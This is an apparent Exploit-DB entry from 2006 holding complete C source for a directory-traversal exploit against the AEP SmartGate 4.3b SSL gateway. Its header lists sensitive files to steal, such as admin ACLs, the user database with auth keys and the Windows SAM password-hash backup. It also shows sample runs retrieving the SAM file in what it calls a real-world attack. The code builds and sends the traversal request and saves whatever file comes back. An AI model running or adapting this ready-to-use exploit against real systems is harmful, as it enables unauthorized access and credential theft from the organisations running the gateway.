AEP SmartGate 4.3b - 'GET' Arbitrary File Download

EDB-ID:

2637

Author:

prdelka

Type:

remote

Platform:

Windows

Published:

2006-10-24

/* prdelka-vs-AEP-smartgate
 * ========================
 * Smartgate is an application layer security gateway that meets FIPS 140-2
 * requirements for large-scale networked environments for IP-based Networks.
 * AEP provide network solutions for government, law enforcement, homeland security,
 * public safety, criminal intelligence and much more.
 * 
 * A vulnerability exists in the smartgate SSL server (listens on port 443 by default)
 * which may allow a malicious user to download arbitrary files with the priviledges
 * of the smartgate server. 
 *
 * By analyzing the returned HTTP header response, an attacker can also test for the 
 * existance of a remote directory. Remote directories return a "Moved Permanently" 
 * error, as opposed to a 404, as shown below.
 * 
 * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f progra~1/v-one/smartgate/data -l sgusrdb.idx
 * [ AEP/Smartgate arbitrary file download exploit
 * [ Connected to www.target.com via (443/tcp)
 * [ Displaying raw HTTP response details
 * HTTP/1.0 301 Moved Permanently
 * Date: Tue Nov 22 16:53:11 GMT+00:00 2005
 * Location: /..\..\..\..\..\..\..\progra~1/v-one/smartgate/data/
 * Server: SSLSERVER/1.0
 * Content-Type: text/html
 * Expires: Now
 *
 * [ Exploit success, directory found
 *
 * A number of files/directories on win32 installations of smartgate may help the attacker further compromise
 * the VPN. Under unix installations the default root directory of smartgate is "/usr/smartgate" but may vary. 
 * 
 *  + progra~1/v-one/smartgate  - default directory for smartgate installation.
 *    + data                    - default directory for data files.
 *     - adm-gw.acl             - admin users are defined here.
 *     - reginfo.dat            - defines data entry fields for users.
 *     - sgate.acl              - access control for secured TCP services.
 *     - sgconf.ini             - dynamic information on the smartgate server including CA information.
 *     - sgusrdb.idx            - contains userid status,long name,group,auth key.
 *     - sweb.acl               - provides access control to webserver.
 *     - sweb.dny               - denies access to specified webservers.
 *  + winnt                     - common system root directory, varies.
 *   + repair                   - contains backup SAM file.
 *     - sam                    - backup of SAM file containing password hashes.
 *   + system32                 - common system32 directory, resides above %sysroot%
 *     - kernel32.dll           - detailed information of win32 version installed.
 *
 * Example.
 * Below is an example of exploit being used to retrieve the SAM password file in a real world attack. This
 * exploit is untested against unix implementations of smartgate but should function as expected with little
 * or no modification (char *http1). Tested against Smartgate V4.3B
 *
 * localhost 0day # gcc prdelka-vs-AEP-smartgate.c -o prdelka-vs-AEP-smartgate -lssl
 * localhost 0day # ./prdelka-vs-AEP-smartgate -s www.target.com -p 443 -f winnt/repair/sam. -l sam
 * [ AEP/Smartgate arbitrary file download exploit
 * [ Connected to www.target.com via (443/tcp)
 * [ Displaying raw HTTP response details
 * HTTP/1.0 200 OK
 * Date: Tue Nov 22 17:06:00 GMT+00:00 2005
 * Content-type: text/plain
 * Content-length: 20480
 * Server: SSLSERVER/1.0
 * Expires: Now
 *
 * [ Exploit success, file found
 * [ Recieved 20480 byte(s) and saved as 'sam'
 * 
 * - prdelka
 */
#include <openssl/ssl.h>
#include <openssl/bio.h>
#include <openssl/err.h>
#include <openssl/ssl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <getopt.h>

int main(int argc,char *argv[])
{
    BIO * bio;
    SSL * ssl;
    SSL_CTX * ctx;
    int p,c,fd,index = 0;
    unsigned long size = 0;
    int ihost = 0, iport = 0, ifile = 0, ilocal = 0, check = 0;
    char *host,*request,*file,*connect,*port,*httpbuf,*httpbuf2;
    char *http1 = "GET /..\\..\\..\\..\\..\\..\\..\\";
    char *http2 = " HTTP/1.1\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A";
    char r[1024];
    static struct option options[]= {
	    {"server", 1, 0, 's'},
	    {"port", 1 , 0, 'p'},
	    {"remotefile", 1, 0, 'f'},
	    {"localfile", 1, 0, 'l'},
	    {"help", 0, 0, 'h'}
    };
    printf("[ AEP/Smartgate arbitrary file download exploit\n");
    while(c != -1)
    {
	    c = getopt_long(argc,argv,"s:p:f:l:h",options,&index);
	    switch(c){
		case -1:
			    break;
		case 's':
			    host = malloc(strlen(optarg) + 1);
			    sprintf(host,"%s",optarg);
			    ihost = 1;
			    break;
		case 'p':
			    port = malloc(strlen(optarg) + 1);
			    sprintf(port,"%s",optarg);
			    iport = 1;
			    break;
		case 'f':
			    request = malloc(strlen(optarg) + strlen(http1) + strlen(http2) + 1);
			    sprintf(request,"%s%s%s",http1,optarg,http2);
			    ifile = 1;
			    break;
		case 'l':
			    file = malloc(strlen(optarg) + 1);
			    sprintf(file,"%s",optarg);
			    ilocal = 1;
			    break;
		case 'h':
			    printf("[\n[ %s\n",argv[0]);
			    printf("[   --server|-s <dns/ip>\n");
			    printf("[   --port|-p <port>\n");
			    printf("[   --remotefile|-f <path/and/file>\n");
			    printf("[   --localfile|-l <localfile/to/saveas>\n");
			    printf("[\n[ For a more detailed explanation read the source\n");
			    exit(0);
			    break;
		default:
			    break;
			    
	    }
    }
    if(ihost != 1 || iport != 1 || ifile != 1 || ilocal != 1){
	    printf("[ Try %s --help\n",argv[0]);
	    exit(0);
    }
    ERR_load_BIO_strings();
    SSL_load_error_strings();
    OpenSSL_add_all_algorithms();
    ctx = SSL_CTX_new(SSLv23_client_method());
    bio = BIO_new_ssl_connect(ctx);
    BIO_get_ssl(bio, & ssl);
    SSL_set_mode(ssl, SSL_MODE_AUTO_RETRY);
    connect = malloc(strlen(host) + strlen(port) + 2);
    sprintf(connect,"%s:%s",host,port);
    BIO_set_conn_hostname(bio, connect);
    if(BIO_do_connect(bio) <= 0)
    {
        fprintf(stderr, "[ Error attempting to connect\n");
        ERR_print_errors_fp(stderr);
        BIO_free_all(bio);
        SSL_CTX_free(ctx);
        return 0;
    }
    printf("[ Connected to %s via (%s/tcp)\n",host,port);
    BIO_write(bio, request, strlen(request));
    check = 0;
    httpbuf = malloc(2);
    memset(httpbuf,0,2);
    while(check == 0)
    {
    	p = BIO_read(bio, r, 1);
    	r[p] = 0;
	httpbuf2 = malloc(strlen(r) + strlen(httpbuf) + 1);
    	sprintf(httpbuf2,"%s%s",httpbuf,r);
	free(httpbuf);
	httpbuf = httpbuf2;
	check = (int)strstr(httpbuf,"\n\n");
    }
    printf("[ Displaying raw HTTP response details\n");
    printf("%s",httpbuf);
    check = 0;
    check = (int)strstr(httpbuf,"200 OK");
    if(check != 0)
    {
	printf("[ Exploit success, file found\n");
    	fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
    	if(fd == -1){
		    printf("[ Error creating %s",file);
		    exit(0);
    	}
    	for(;;)
    	{
       		p = BIO_read(bio, r, 1023);
        	if(p <= 0) break;
       	        r[p] = 0;
		write(fd,r,p);
		size = size + p;
    	}
	printf("[ Recieved %u byte(s) and saved as '%s'\n",size,file);
	close(fd);
    }
    if(check==0)
    {
    	check = (int)strstr(httpbuf,"301 Moved");
   	 if(check != 0)
    	{
		    printf("[ Exploit success, directory found\n");
    	}
    }
    free(httpbuf);
    if(check == 0)
    {
	    printf("[ Exploit failed\n");
    }
    BIO_free_all(bio);
    SSL_CTX_free(ctx);
    return 0;
}

// milw0rm.com [2006-10-24]